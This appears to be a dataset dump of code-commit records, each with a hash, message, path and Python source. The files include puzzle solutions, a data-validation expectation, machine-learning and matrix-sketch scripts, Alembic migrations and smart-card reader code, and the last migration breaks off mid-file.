SOCIAL_AUTH_SANITIZE_REDIRECTS = False
SOCIAL_AUTH_PIPELINE = (
'social_auth.backends.pipeline.social.social_auth_user',
#'social_auth.backends.pipeline.associate.associate_by_email',
'core.user.get_username',
'core.user.create_user',
'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'social_auth.backends.pipeline.user.update_user_details'
)
#INTERNAL_IPS = ('127.0.0.1', '10.0.2.2')
try:
from local_settings import *
except ImportError as e:
pass
| Python | 0.000002 | |
fc911a4952a46ea372e1a42cff78351b4f8b42ef | complete 15 lattice paths | 15-lattice-paths.py | 15-lattice-paths.py | from collections import defaultdict
from math import factorial as fac
if __name__ == '__main__':
# Dynamic programming method
paths = defaultdict(dict)
for i in range(21):
paths[0][i] = 1
paths[i][0] = 1
for i in range(1, 21):
for j in range(1, 21):
paths[i][j] = paths[i-1][j] + paths[i][j-1]
print(paths[20][20])
# Pure math
print(fac(40)//fac(20)//fac(20))
| Python | 0 | |
7b9ba5b6f692c6f0e4408364c275abda05518c2b | add expect_column_values_to_be_valid_west_virginia_zip (#4802) | contrib/experimental/great_expectations_experimental/expectations/expect_column_values_to_be_valid_west_virginia_zip.py | contrib/experimental/great_expectations_experimental/expectations/expect_column_values_to_be_valid_west_virginia_zip.py | import json
from typing import Optional
import zipcodes
from great_expectations.core.expectation_configuration import ExpectationConfiguration
from great_expectations.exceptions import InvalidExpectationConfigurationError
from great_expectations.execution_engine import (
PandasExecutionEngine,
SparkDFExecutionEngine,
SqlAlchemyExecutionEngine,
)
from great_expectations.expectations.expectation import ColumnMapExpectation
from great_expectations.expectations.metrics import (
ColumnMapMetricProvider,
column_condition_partial,
)
def is_valid_west_virginia_zip(zip: str):
list_of_dicts_of_west_virginia_zips = zipcodes.filter_by(state="WV")
list_of_west_virginia_zips = [
d["zip_code"] for d in list_of_dicts_of_west_virginia_zips
]
if len(zip) > 10:
return False
elif type(zip) != str:
return False
elif zip in list_of_west_virginia_zips:
return True
else:
return False
# This class defines a Metric to support your Expectation.
# For most ColumnMapExpectations, the main business logic for calculation will live in this class.
class ColumnValuesToBeValidWestVirginiaZip(ColumnMapMetricProvider):
# This is the id string that will be used to reference your metric.
condition_metric_name = "column_values.valid_west_virginia_zip"
# This method implements the core logic for the PandasExecutionEngine
@column_condition_partial(engine=PandasExecutionEngine)
def _pandas(cls, column, **kwargs):
return column.apply(lambda x: is_valid_west_virginia_zip(x))
# This method defines the business logic for evaluating your metric when using a SqlAlchemyExecutionEngine
# @column_condition_partial(engine=SqlAlchemyExecutionEngine)
# def _sqlalchemy(cls, column, _dialect, **kwargs):
# raise NotImplementedError
# This method defines the business logic for evaluating your metric when using a SparkDFExecutionEngine
# @column_condition_partial(engine=SparkDFExecutionEngine)
# def _spark(cls, column, **kwargs):
# raise NotImplementedError
# This class defines the Expectation itself
class ExpectColumnValuesToBeValidWestVirginiaZip(ColumnMapExpectation):
"""Expect values in this column to be valid West Virginia zipcodes.
See https://pypi.org/project/zipcodes/ for more information.
"""
# These examples will be shown in the public gallery.
# They will also be executed as unit tests for your Expectation.
examples = [
{
"data": {
"valid_west_virginia_zip": ["24701", "24920", "25168", "26886"],
"invalid_west_virginia_zip": ["-10000", "1234", "99999", "25487"],
},
"tests": [
{
"title": "basic_positive_test",
"exact_match_out": False,
"include_in_gallery": True,
"in": {"column": "valid_west_virginia_zip"},
"out": {"success": True},
},
{
"title": "basic_negative_test",
"exact_match_out": False,
"include_in_gallery": True,
"in": {"column": "invalid_west_virginia_zip"},
"out": {"success": False},
},
],
}
]
# This is the id string of the Metric used by this Expectation.
# For most Expectations, it will be the same as the `condition_metric_name` defined in your Metric class above.
map_metric = "column_values.valid_west_virginia_zip"
# This is a list of parameter names that can affect whether the Expectation evaluates to True or False
success_keys = ("mostly",)
# This dictionary contains default values for any parameters that should have default values
default_kwarg_values = {}
def validate_configuration(
self, configuration: Optional[ExpectationConfiguration]
) -> None:
"""
Validates that a configuration has been set, and sets a configuration if it has yet to be set. Ensures that
necessary configuration arguments have been provided for the validation of the expectation.
Args:
configuration (OPTIONAL[ExpectationConfiguration]): \
An optional Expectation Configuration entry that will be used to configure the expectation
Returns:
None. Raises InvalidExpectationConfigurationError if the config is not validated successfully
"""
super().validate_configuration(configuration)
if configuration is None:
configuration = self.configuration
# # Check other things in configuration.kwargs and raise Exceptions if needed
# try:
# assert (
# ...
# ), "message"
# assert (
# ...
# ), "message"
# except AssertionError as e:
# raise InvalidExpectationConfigurationError(str(e))
# This object contains metadata for display in the public Gallery
library_metadata = {
"maturity": "experimental", # "experimental", "beta", or "production"
"tags": [
"hackathon",
"typed-entities",
], # Tags for this Expectation in the Gallery
"contributors": [ # Github handles for all contributors to this Expectation.
"@luismdiaz01",
"@derekma73", # Don't forget to add your github handle here!
],
"requirements": ["zipcodes"],
}
if __name__ == "__main__":
ExpectColumnValuesToBeValidWestVirginiaZip().print_diagnostic_checklist()
| Python | 0 | |
684387315025bc7789aa75def757894cb8d92154 | add quickie Python JSON-filtering script | dev/filter_json.py | dev/filter_json.py | # == BSD2 LICENSE ==
# Copyright (c) 2014, Tidepool Project
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the associated License, which is identical to the BSD 2-Clause
# License as published by the Open Source Initiative at opensource.org.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the License for more details.
#
# You should have received a copy of the License along with this program; if
# not, you can obtain one from Tidepool Project at tidepool.org.
# == BSD2 LICENSE ==
# Usage:
# python filter_json.py <path/to/JSON/file> <filter> <optional/path/to/output/file>
import json
import sys
def main():
o = open(sys.argv[1], 'rU')
try:
output_file = open(sys.argv[3], 'w')
except IndexError:
output_file = open('filter-output.json', 'w')
jsn = json.load(o)
filtered = []
for obj in jsn:
if obj['type'] == sys.argv[2]:
filtered.append(obj)
print >> output_file, json.dumps(filtered, separators=(',',': '), indent=4)
if __name__ == '__main__':
main() | Python | 0.000001 | |
7d20f9bcbfda514c216fb7faaa08325f21c0e119 | add 01 code | 01-two-snum.py | 01-two-snum.py | class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
for i in range(len(nums)):
last = nums[i]
# print last
for j, num in enumerate(nums[i+1:]):
# print j, num
if last + num == target:
return [i,i+1+j]
| Python | 0 | |
dd2422293e403a9f664fe887d3fd0950ba540fc0 | the inverse returns an int | 044_pentagon_numbers.py | 044_pentagon_numbers.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# A Solution to "Pentagon numbers" – Project Euler Problem No. 44
# by Florian Buetow
#
# Sourcecode: https://github.com/fbcom/project-euler
# Problem statement: https://projecteuler.net/problem=44
def get_pentagonal_number(n):
return int(n*(3*n-1)/2)
def is_pentagonal_number(n):
tmp = (1 + (1.0+24*n)**0.5) / 6 # inverse function of n*(3n-1)
return int(tmp) == tmp # n is pentagonal if the inverse function yields an int
# Testcases
some_pentagonal_numbers = [1, 5, 12, 22, 35, 51, 70, 92, 117, 145]
for n in some_pentagonal_numbers:
assert is_pentagonal_number(n), "Testcase failed"
for n in range(1, 11):
assert get_pentagonal_number(n) == some_pentagonal_numbers[n-1], "Testcase failed"
# Solve
solution = None
k = 0
while not solution:
k += 1
p_k = get_pentagonal_number(k)
j = k
while j > 1:
j -= 1
p_j = get_pentagonal_number(j)
if is_pentagonal_number(p_k + p_j) and\
is_pentagonal_number(p_k - p_j):
solution = int(p_k - p_j)
# print "p%d=%d, p%d=%d, solution=%d" % (k, p_k, j, p_j, solution)
break
print "Solution:", solution
| Python | 0.99996 | |
b699a18f8928a6e859ebc34a843e4c8a64a22b26 | add script to grid-search model parameters — script from scikit-learn: http://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html#sklearn.model_selection.GridSearchCV | scripts/grid_search_digits.py | scripts/grid_search_digits.py | """
============================================================
Parameter estimation using grid search with cross-validation
============================================================
This examples shows how a classifier is optimized by cross-validation,
which is done using the :class:`sklearn.model_selection.GridSearchCV` object
on a development set that comprises only half of the available labeled data.
The performance of the selected hyper-parameters and trained model is
then measured on a dedicated evaluation set that was not used during
the model selection step.
More details on tools available for model selection can be found in the
sections on :ref:`cross_validation` and :ref:`grid_search`.
"""
from __future__ import print_function
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.svm import SVC
print(__doc__)
# Loading the Digits dataset
digits = datasets.load_digits()
# To apply an classifier on this data, we need to flatten the image, to
# turn the data in a (samples, feature) matrix:
n_samples = len(digits.images)
X = digits.images.reshape((n_samples, -1))
y = digits.target
# Split the dataset in two equal parts
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.5, random_state=0)
# Set the parameters by cross-validation
tuned_parameters = [{'kernel': ['rbf'], 'gamma': [1e-3, 1e-4],
'C': [1, 10, 100, 1000]},
{'kernel': ['linear'], 'C': [1, 10, 100, 1000]}]
scores = ['precision', 'recall']
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
print()
clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5,
scoring='%s_macro' % score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set:")
print()
print(clf.best_params_)
print()
print("Grid scores on development set:")
print()
means = clf.cv_results_['mean_test_score']
stds = clf.cv_results_['std_test_score']
for mean, std, params in zip(means, stds, clf.cv_results_['params']):
print("%0.3f (+/-%0.03f) for %r"
% (mean, std * 2, params))
print()
print("Detailed classification report:")
print()
print("The model is trained on the full development set.")
print("The scores are computed on the full evaluation set.")
print()
y_true, y_pred = y_test, clf.predict(X_test)
print(classification_report(y_true, y_pred))
print()
# Note the problem is too easy: the hyperparameter plateau is too flat and the
# output model is the same for precision and recall with ties in quality.
| Python | 0 | |
3c2316b69fcee9db820937c2814a9872e27f95a9 | Implement frequent direction sketch | fd_sketch.py | fd_sketch.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
import numpy as np
import numpy.linalg as ln
import math
import sys
""" This is a simple and deterministic method for matrix sketch.
The original method has been introduced in [Liberty2013]_ .
[Liberty2013] Edo Liberty, "Simple and Deterministic Matrix Sketching", ACM SIGKDD, 2013.
"""
def sketch(mat_a, ell):
"""Compute a sketch matrix of input matrix
Note that \ell must be smaller than m * 2
:param mat_a: original matrix to be sketched (n x m)
:param ell: the number of rows in sketch matrix
:returns: sketch matrix (\ell x m)
"""
# number of columns
m = mat_a.shape[1]
# Input error handling
if math.floor(ell / 2) >= m:
raise ValueError('Error: ell must be smaller than m * 2')
if ell >= mat_a.shape[0]:
raise ValueError('Error: ell must not be greater than n')
# initialize output matrix B
mat_b = np.zeros([ell, m])
# compute zero valued row list
zero_rows = np.nonzero([round(s, 7) == 0.0 for s in np.sum(mat_b, axis = 1)])[0].tolist()
# repeat inserting each row of matrix A
for i in range(0, mat_a.shape[0]):
# insert a row into matrix B
mat_b[zero_rows[0], :] = mat_a[i, :]
# remove zero valued row from the list
zero_rows.remove(zero_rows[0])
# if there is no more zero valued row
if len(zero_rows) == 0:
# compute SVD of matrix B
mat_u, vec_sigma, mat_v = ln.svd(mat_b, full_matrices=False)
# obtain squared singular value for threshold
squared_sv_center = vec_sigma[math.floor(ell / 2)] ** 2
# update sigma to shrink the row norms
sigma_tilda = [(0.0 if d < 0.0 else math.sqrt(d)) for d in (vec_sigma ** 2 - squared_sv_center)]
# update matrix B where at least half rows are all zero
mat_b = np.dot(np.diagflat(sigma_tilda), mat_v)
# update the zero valued row list
zero_rows = np.nonzero([round(s, 7) == 0 for s in np.sum(mat_b, axis = 1)])[0].tolist()
return mat_b
def calculateError(mat_a, mat_b):
"""Compute the degree of error by sketching
:param mat_a: original matrix
:param mat_b: sketch matrix
:returns: reconstruction error
"""
dot_mat_a = np.dot(mat_a.T, mat_a)
dot_mat_b = np.dot(mat_b.T, mat_b)
return ln.norm(dot_mat_a - dot_mat_b, ord = 2)
def squaredFrobeniusNorm(mat_a):
"""Compute the squared Frobenius norm of a matrix
:param mat_a: original matrix
:returns: squared Frobenius norm
"""
return ln.norm(mat_a, ord = 'fro') ** 2
| Python | 0.000037 | |
fe86df913b79fdf8c3627fe31b87c6dfa3da4f46 | implement QEngine | engines/QEngine.py | engines/QEngine.py | #!/usr/bin/env python3
from ChessEngine import ChessEngine
import chess
import sys
sys.path.append('.')
import data
class QEngine(ChessEngine):
def __init__(self, picklefile):
super().__init__()
with open(picklefile, "rb") as f:
self.Q = pickle.load(Q, f)
def search(self):
s = data.state_from_board(board, hashable=True)
try:
a = Q[s]
from_square = a // NUM_SQUARES
to_square = a % NUM_SQUARES
move = chess.Move(from_square, to_square)
except:
moves = list(self.board.generate_legal_moves())
move = random.choice(moves)
self.moves = [move]
if __name__ == "__main__":
engine = QEngine("engines/sarsa_Q_-_.pickle")
engine.run()
| Python | 0.000007 | |
e782e519012c4734f591388114fc954fdc014acf | add thousands_separator in Python to format folder | src/Python/format/thousands_separator.py | src/Python/format/thousands_separator.py | #!/usr/bin/env python
print " Formated number:", "{:,}".format(102403)
| Python | 0 | |
3e8c18b32058d9d33ae0d12744355bb65c2b96ed | add alembic migration for orders table | migrations/versions/187cf9175cee_add_orders_table.py | migrations/versions/187cf9175cee_add_orders_table.py | """add orders table
Revision ID: 187cf9175cee
Revises: 3d8cf74c2de4
Create Date: 2015-10-23 23:43:31.769594
"""
# revision identifiers, used by Alembic.
revision = '187cf9175cee'
down_revision = '3d8cf74c2de4'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('orders',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.Unicode(length=255), nullable=True),
sa.Column('email', sa.Unicode(length=255), nullable=True),
sa.Column('phone', sa.Unicode(length=12), nullable=True),
sa.Column('placed_date', sa.DateTime(), nullable=True),
sa.Column('dj', sa.UnicodeText(), nullable=True),
sa.Column('thank_on_air', sa.Boolean(), nullable=True),
sa.Column('first_time', sa.Boolean(), nullable=True),
sa.Column('premiums', sa.Unicode(length=255), nullable=True),
sa.Column('address1', sa.Unicode(length=255), nullable=True),
sa.Column('address2', sa.Unicode(length=255), nullable=True),
sa.Column('city', sa.Unicode(length=255), nullable=True),
sa.Column('state', sa.Unicode(length=255), nullable=True),
sa.Column('zipcode', sa.Integer(), nullable=True),
sa.Column('amount', sa.Integer(), nullable=True),
sa.Column('recurring', sa.Boolean(), nullable=True),
sa.Column('paid_date', sa.DateTime(), nullable=True),
sa.Column('shipped_date', sa.DateTime(), nullable=True),
sa.Column('tshirtsize', sa.Unicode(length=255), nullable=True),
sa.Column('tshirtcolor', sa.Unicode(length=255), nullable=True),
sa.Column('sweatshirtsize', sa.Unicode(length=255), nullable=True),
sa.Column('method', sa.Unicode(length=255), nullable=True),
sa.Column('custid', sa.Unicode(length=255), nullable=True),
sa.Column('comments', sa.UnicodeText(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('orders')
### end Alembic commands ###
| Python | 0 | |
64dede2c9a3d489eb8c93200ea8788c26db6da31 | Create 6kyu_divisor_harmony.py | Solutions/6kyu/6kyu_divisor_harmony.py | Solutions/6kyu/6kyu_divisor_harmony.py | def solve(a,b):
pairs={}
for i in range(a,b):
ratio=div_sum(i)/i
try: pairs[ratio]=pairs[ratio]+[i]
except: pairs[ratio]=[i]
return sum(min(i) for i in pairs.values() if len(i)>=2)
def div_sum(n):
return sum(i for i in range(1,n+1) if n%i==0)
| Python | 0.000014 | |
de7b7d10e5776d631c15660255cf8ad2b85f3d25 | Create Beginner 10-A.py | Beginner/10/10-A.py | Beginner/10/10-A.py | #AtCoder Beginner 10 A
name = raw_input()
print name + "pp"
| Python | 0.000084 | |
d65e9246256709f2cec0fa863515cca0dc4acb0b | add config for sphinx documentation | doc/source/conf.py | doc/source/conf.py | # -*- coding: utf-8 -*-
#
# lilik_playbook documentation build configuration file, created by
# sphinx-quickstart on Fri Apr 7 14:02:37 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.githubpages']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lilik_playbook'
copyright = u'2017, edoput, kaos, slash'
author = u'edoput, kaos, slash'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.1'
# The full version, including alpha/beta/rc tags.
release = u'0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'lilik_playbookdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'lilik_playbook.tex', u'lilik\\_playbook Documentation',
u'edoput, kaos, slash', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'lilik_playbook', u'lilik_playbook Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'lilik_playbook', u'lilik_playbook Documentation',
author, 'lilik_playbook', 'One line description of project.',
'Miscellaneous'),
]
| Python | 0 | |
871e9e4bdca027e577bdcde38f483e2de32c8528 | Add simple example | examples/simple.py | examples/simple.py | # -*- coding: utf-8 -*-
import time
from apns_proxy_client import APNSProxyClient
valid_token = "YOUR VALID TOKEN"
def main():
client = APNSProxyClient(host="localhost", port=5556, application_id="14")
i = 0
with client:
token = valid_token
client.send(token, 'Alert with default sound')
time.sleep(2)
client.send(token, 'Alert with custom sound', sound='custom')
time.sleep(2)
client.send(token, 'I am silent', sound=None)
time.sleep(2)
client.send(token, 'Alert with badge', badge=2)
time.sleep(2)
client.send(token, None, badge=99, sound=None)
time.sleep(2)
one_hour_later = int(time.time()) + (60 * 60)
client.send(token, 'I am long life', expiry=one_hour_later)
time.sleep(2)
client.send(token, 'I am low priority', priority=5)
time.sleep(2)
# For background fetch
client.send(token, None, sound=None, content_available=True)
time.sleep(2)
client.send(token, 'With custom field', custom={
'foo': True,
'bar': [200, 300],
'boo': "Hello"
})
time.sleep(2)
client.send(token, {
'body': 'This is JSON alert',
'action_loc_key': None,
'loc_key': 'loc key',
'loc_args': ['one', 'two'],
'launch_image': 'aa.png'
})
client.send(token, 'This message never send to device', test=True)
if __name__ == "__main__":
main()
print("Done")
| Python | 0.000375 | |
9ec5e3f57a64e6242b5d91eb0bf66e238fa48ec2 | call superclass __init__() in constructor | smartcard/pyro/PyroReader.py | smartcard/pyro/PyroReader.py | """PyroReaderClient: concrete reader class for Remote Readers
__author__ = "gemalto http://www.gemalto.com"
Copyright 2001-2012 gemalto
Author: Jean-Daniel Aussel, mailto:jean-daniel.aussel@gemalto.com
This file is part of pyscard.
pyscard is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
pyscard is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with pyscard; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import Pyro.core
import Pyro.naming
from smartcard.Exceptions import NoCardException
from smartcard.reader.Reader import Reader
class PyroReader(Reader):
"""Remote reader class."""
def __init__(self, readername):
"""Constructs a new Remote Reader client implementation from a
Pyro URI."""
super().__init__(readername)
ns = Pyro.naming.NameServerLocator().getNS()
self.uri = ns.resolve(':pyscard.smartcard.readers.' + readername)
self.reader = Pyro.core.getAttrProxyForURI(self.uri)
self.name = self.reader.name
def addtoreadergroup(self, groupname):
"""Add reader to a reader group."""
self.reader.addtoreadergroup(groupname)
def removefromreadergroup(self, groupname):
"""Remove a reader from a reader group"""
self.reader.removefromreadergroup(groupname)
def createConnection(self):
"""Return a card connection thru a remote reader."""
uri = self.reader.createConnection()
return Pyro.core.getAttrProxyForURI(uri)
class Factory:
def create(readername):
return PyroReader(readername)
create = staticmethod(create)
def readers(groups=[]):
readernames = []
try:
ns = Pyro.naming.NameServerLocator().getNS()
readernames = ns.list(':pyscard.smartcard.readers')
except Pyro.errors.NamingError:
print('Warning: pyro name server not found')
remotereaders = []
for readername in readernames:
remotereaders.append(PyroReader.Factory.create(readername[0]))
return remotereaders
readers = staticmethod(readers)
if __name__ == '__main__':
SELECT = [0xA0, 0xA4, 0x00, 0x00, 0x02]
DF_TELECOM = [0x7F, 0x10]
from smartcard.util import *
remotereaders = PyroReader.readers()
for reader in remotereaders:
try:
print(reader.name, ', uri: ', reader.uri)
connection = reader.createConnection()
connection.connect()
print(toHexString(connection.getATR()))
data, sw1, sw2 = connection.transmit(SELECT + DF_TELECOM)
print("%X %X" % (sw1, sw2))
except NoCardException as x:
print('no card in reader')
| """PyroReaderClient: concrete reader class for Remote Readers
__author__ = "gemalto http://www.gemalto.com"
Copyright 2001-2012 gemalto
Author: Jean-Daniel Aussel, mailto:jean-daniel.aussel@gemalto.com
This file is part of pyscard.
pyscard is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
pyscard is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with pyscard; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import Pyro.core
import Pyro.naming
from smartcard.Exceptions import NoCardException
from smartcard.reader.Reader import Reader
class PyroReader(Reader):
"""Remote reader class."""
def __init__(self, readername):
"""Constructs a new Remote Reader client implementation from a
Pyro URI."""
ns = Pyro.naming.NameServerLocator().getNS()
self.uri = ns.resolve(':pyscard.smartcard.readers.' + readername)
self.reader = Pyro.core.getAttrProxyForURI(self.uri)
self.name = self.reader.name
def addtoreadergroup(self, groupname):
"""Add reader to a reader group."""
self.reader.addtoreadergroup(groupname)
def removefromreadergroup(self, groupname):
"""Remove a reader from a reader group"""
self.reader.removefromreadergroup(groupname)
def createConnection(self):
"""Return a card connection thru a remote reader."""
uri = self.reader.createConnection()
return Pyro.core.getAttrProxyForURI(uri)
class Factory:
def create(readername):
return PyroReader(readername)
create = staticmethod(create)
def readers(groups=[]):
readernames = []
try:
ns = Pyro.naming.NameServerLocator().getNS()
readernames = ns.list(':pyscard.smartcard.readers')
except Pyro.errors.NamingError:
print('Warning: pyro name server not found')
remotereaders = []
for readername in readernames:
remotereaders.append(PyroReader.Factory.create(readername[0]))
return remotereaders
readers = staticmethod(readers)
if __name__ == '__main__':
SELECT = [0xA0, 0xA4, 0x00, 0x00, 0x02]
DF_TELECOM = [0x7F, 0x10]
from smartcard.util import *
remotereaders = PyroReader.readers()
for reader in remotereaders:
try:
print(reader.name, ', uri: ', reader.uri)
connection = reader.createConnection()
connection.connect()
print(toHexString(connection.getATR()))
data, sw1, sw2 = connection.transmit(SELECT + DF_TELECOM)
print("%X %X" % (sw1, sw2))
except NoCardException as x:
print('no card in reader')
| Python | 0.000024 |
9f7bd49350b0d1b8a8986b28db75a5b369bf7bb5 | Add py solution for 393. UTF-8 Validation | py/utf-8-validation.py | py/utf-8-validation.py | class Solution(object):
def validUtf8(self, data):
"""
:type data: List[int]
:rtype: bool
"""
it = iter(data)
while True:
try:
c = it.next() & 0xff
try:
t = 0x80
n = 0
while t > 0:
if t & c:
n += 1
t >>= 1
else:
break
if n == 1 or n > 4:
return False
elif n > 1:
for _ in xrange(n - 1):
c = it.next() & 0xff
if c & 0xc0 != 0x80:
return False
except StopIteration:
return False
except StopIteration:
return True
| Python | 0.000002 | |
fb70822079c47962f0f713bcea43af80fe58d93e | add example using the VTKMesh class | examples/mesh_vtk_example.py | examples/mesh_vtk_example.py | from numpy import array
from simphony.cuds.mesh import Point, Cell, Edge, Face
from simphony.core.data_container import DataContainer
from simphony_mayavi.cuds.api import VTKMesh
points = array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
cells = [
[0, 1, 2, 3], # tetra
[4, 5, 6, 7, 8, 9, 10, 11]] # hex
faces = [[2, 7, 11]]
edges = [[1, 4], [3, 8]]
mesh = VTKMesh('example')
# add points
uids = [
mesh.add_point(
Point(coordinates=point, data=DataContainer(TEMPERATURE=index)))
for index, point in enumerate(points)]
# add edges
edge_uids = [
mesh.add_edge(
Edge(points=[uids[index] for index in element]))
for index, element in enumerate(edges)]
# add faces
face_uids = [
mesh.add_face(
Face(points=[uids[index] for index in element]))
for index, element in enumerate(faces)]
# add cells
cell_uids = [
mesh.add_cell(
Cell(points=[uids[index] for index in element]))
for index, element in enumerate(cells)]
if __name__ == '__main__':
from simphony.visualisation import mayavi_tools
# Visualise the Mesh object
mayavi_tools.show(mesh)
| Python | 0 | |
bdc062830a943a312dc6b56002f5ca6ae3990b80 | add example | examples/peer/peer_matrix.py | examples/peer/peer_matrix.py | import cupy
def main():
gpus = cupy.cuda.runtime.getDeviceCount()
for peerDevice in range(gpus):
for device in range(gpus):
if peerDevice == device:
continue
flag = cupy.cuda.runtime.deviceCanAccessPeer(device, peerDevice)
print(
f'Can access #{peerDevice} memory from #{device}: '
f'{flag == 1}')
if __name__ == '__main__':
main()
| Python | 0.000002 | |
51530297a561fa9630f69c70810c1b4bbeb7ecf0 | Create testmessage table | migrations/versions/187eade64ef0_create_testmessage_table.py | migrations/versions/187eade64ef0_create_testmessage_table.py | """Create testmessage table
Revision ID: 187eade64ef0
Revises: 016f138b2da8
Create Date: 2016-06-21 16:11:47.905481
"""
# revision identifiers, used by Alembic.
revision = '187eade64ef0'
down_revision = '016f138b2da8'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'testmessage',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('test_id', sa.GUID(), nullable=False),
sa.Column('artifact_id', sa.GUID(), nullable=False),
sa.Column('start_offset', sa.Integer(), nullable=False),
sa.Column('length', sa.Integer(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.ForeignKeyConstraint(['test_id'], ['test.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['artifact_id'], ['artifact.id'], ondelete='CASCADE'),
)
op.create_index('idx_testmessage_test_id', 'testmessage', ['test_id'], unique=False)
def downgrade():
op.drop_table('testmessage')
| Python | 0 | |
cc84a5c71f84596af61b2de4a16cd62ff0209b16 | Add migration file | migrations/versions/fd02d1c7d64_add_hail_migration_fields.py | migrations/versions/fd02d1c7d64_add_hail_migration_fields.py | """Add hail migration fields
Revision ID: fd02d1c7d64
Revises: 59e5faf237f8
Create Date: 2015-04-15 12:04:43.286358
"""
# revision identifiers, used by Alembic.
revision = 'fd02d1c7d64'
down_revision = '59e5faf237f8'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('hail',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('creation_datetime', sa.DateTime(), nullable=False),
sa.Column('client_id', sa.Integer(), nullable=False),
sa.Column('client_lon', sa.Float(), nullable=False),
sa.Column('client_lat', sa.Float(), nullable=False),
